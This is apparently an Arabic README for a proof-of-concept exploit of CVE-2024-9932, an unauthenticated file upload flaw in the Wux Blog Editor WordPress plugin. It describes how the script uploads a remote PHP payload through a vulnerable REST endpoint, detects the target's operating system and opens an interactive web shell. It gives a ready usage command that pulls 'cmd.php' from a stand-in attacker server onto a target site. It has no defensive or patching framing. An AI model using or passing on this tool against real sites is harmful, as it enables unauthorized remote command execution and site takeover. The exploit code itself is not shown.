
استغلال ثغرة تنفيذ تعليمات برمجية عن بعد (RCE) بدون مصادقة وبدون نقرة (0-click) لـ CVE-2024-9932. يستغل ثغرة رفع ملفات عشوائية في إضافة Wux Blog Editor لووردبريس لرفع حمولة PHP عن بعد، واكتشاف نظام التشغيل الهدف، وتحقيق تنفيذ أوامر عن بعد من خلال ويب شِل تفاعلي.

يحتوي هذا المستودع على إثبات مفهوم لاستغلال ثغرة CVE-2024-9932، وهي ثغرة رفع ملف عشوائي غير مصادق عليها في إضافة Wux Blog Editor لووردبريس، مما يؤدي إلى تنفيذ أوامر عن بُعد (RCE).
يستغل السكربت نقطة نهاية REST ضعيفة لرفع حمولة PHP عن بُعد دون مصادقة. بعد الرفع، يقوم بإعادة بناء موقع الملف النهائي، واكتشاف نظام التشغيل المستهدف، وتوفير شل تفاعلي عن بُعد لتنفيذ الأوامر.
python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
بعد التنفيذ، يقوم السكربت برفع الحمولة، وتأكيد إمكانية الوصول إليها، واكتشاف نظام التشغيل، ثم الدخول إلى شل تفاعلي.